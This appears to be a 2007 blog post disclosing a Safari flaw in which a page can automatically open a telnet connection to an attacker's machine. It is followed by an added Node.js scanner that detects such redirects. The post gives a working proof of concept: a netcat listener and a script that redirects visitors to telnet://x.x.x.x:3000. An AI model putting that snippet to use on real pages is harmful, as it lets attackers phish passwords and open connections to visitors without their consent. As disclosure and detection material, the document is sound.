Safari security


Author: Gareth Heyes (@hackvertor)

Published: Fri, 16 Nov 2007 11:05:23 GMT

Updated: Sat, 22 Mar 2025 15:38:07 GMT

Well, what do you do when you report a bug to Apple and they deny it is even a problem?

Turn it into a remote one.

What do you do when they don't provide you with any credit whatsoever? Give up? Stop testing Safari? Or drink lots of coffee and Red Bull, stay up all night hacking the hell out of their browser? I went for the last one :) You see, Apple, I don't really care if you provide me credit or not, I just like hacking browsers :P

OK, onto the fun. Apple seem to have some sort of security-related breakdown because they allow the telnet protocol. On top of that, they allow it to connect automatically, and to any address. Yeah, crazy eh? Can you see where this is going? :) Take the following simple example:-

The attacker opens up a terminal on any remote machine:-

<pre lang="bash">
nc -vv -l -p 3000
</pre>

The above command listens for incoming connections on port 3000. The attacker then tricks a user into visiting their evil web page:-

<pre lang="javascript">
<script type="text/javascript">
// x.x.x.x = attacker's remote IP
self.location = 'telnet://x.x.x.x:3000';
</script>
</pre>

A connection is then established between the user and the attacker. The attacker can prompt the user to enter their OS X password etc., and it may even be possible to execute an interactive shell. All not good, I'm sure you'll agree.

To make Safari secure simply select the Safari icon in applications and drag it to the waste bin.
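
One way to spot the pattern above in page content, for example in a filtering proxy or a content review script, shown as an added example that is not part of the original post: a Node.js scan for script, frame and meta-refresh navigations whose URL scheme is not one the browser renders itself. The function name, the scheme allowlist, the regex heuristics and the sample pages are assumptions made for this example.

```javascript
// Added example: flag markup that navigates, without a user click, to a URL
// scheme the browser hands to another application (as telnet:// is above).
// The allowlist below is an assumption for this example, not a standard.
const WEB_SCHEMES = new Set(['http:', 'https:', 'about:', 'blob:', 'data:']);

// Contexts that navigate automatically (heuristic patterns, not a full parser).
const AUTO_CONTEXTS = [
  /location(?:\.href)?\s*=\s*['"]([^'"]+)['"]/gi,          // self.location = '...'
  /location\.(?:assign|replace)\(\s*['"]([^'"]+)['"]/gi,   // location.replace('...')
  /<i?frame[^>]+src\s*=\s*['"]([^'"]+)['"]/gi,             // <iframe src="...">
  /<meta[^>]+http-equiv\s*=\s*['"]refresh['"][^>]*url=([^'">\s]+)/gi,
];

function findExternalSchemeNavigations(html) {
  const findings = [];
  for (const pattern of AUTO_CONTEXTS) {
    for (const match of html.matchAll(pattern)) {
      let url;
      try {
        url = new URL(match[1]); // relative URLs throw: same-origin, skip
      } catch {
        continue;
      }
      if (!WEB_SCHEMES.has(url.protocol)) {
        findings.push({
          scheme: url.protocol,
          host: url.hostname,
          port: url.port,
          raw: match[1],
        });
      }
    }
  }
  return findings;
}

// Constructed sample pages; 192.0.2.10 is a documentation-only address.
const suspectPage = `<script type="text/javascript">
self.location = 'telnet://192.0.2.10:3000';
</script>`;
const benignPage = `<a href="telnet://192.0.2.10">manual link</a>
<script>location.href = '/login';</script>
<iframe src="https://example.com/widget"></iframe>`;

console.log(findExternalSchemeNavigations(suspectPage)); // one telnet: finding
console.log(findExternalSchemeNavigations(benignPage));  // no findings
```

A plain link is deliberately not flagged, because it needs a click; the concern described in the post is the connection that starts on page load.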
